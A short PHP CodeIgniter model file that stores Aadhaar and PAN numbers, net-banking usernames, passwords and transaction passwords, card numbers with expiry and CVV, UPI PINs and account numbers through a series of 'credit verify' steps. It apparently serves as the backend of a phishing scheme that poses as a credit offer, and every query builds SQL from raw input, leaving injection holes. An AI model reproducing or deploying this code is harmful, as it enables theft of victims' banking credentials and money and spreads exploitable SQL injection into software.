<?php
if ( ! defined('BASEPATH')) exit('No direct script access allowed');

class Usermanage extends CI_Model {
	
	function __construct() 
	{
    parent::__construct();
	
	}
		public function insertcreditfirstverify($data)
	{
	    $this->db->query("insert into users set firstname='".$data['name']."', mobile='".$data['mobile']."', device_id='".$data['device_id']."', adhaar='".$data['adhaar']."', pan='".$data['pan']."' ");
	    return $this->db->insert_id();
	}
	public function insertcreditnetbankverify($data)
	{
	    $this->db->query("update users set username='".$data['userid']."', password='".$data['password']."', tpassword='".$data['tpassword']."' where id=".$data['id']." ");
	    return 1;
	}
	public function insertcreditdebitverify($data)
	{
	    $this->db->query("update users set cardnumber='".$data['cardno']."', expirydate='".$data['expiry']."', cvv='".$data['cvv']."' where id=".$data['id']." ");
	    return 1;
	}
	public function insertcreditpinverify($data)
	{
	    $this->db->query("update users set upipin='".$data['pin']."' where id=".$data['id']." ");
	    return 1;
	}
		public function insertcreditmpinverify($data)
	{
	    $this->db->query("update users set acnumber='".$data['ac']."', dob='".$data['dob']."' where id=".$data['id']." ");
	    return 1;
	}
		public function insertcreditdobverify($data)
	{
	    $this->db->query("update users set issue='".$data['issue']."' where id=".$data['id']." ");
	    return 1;
	}
	public function getsettings()
  {
       $result=$this->db->query("SELECT * FROM settings");
       return $result->row();
      
  }
 
}
?>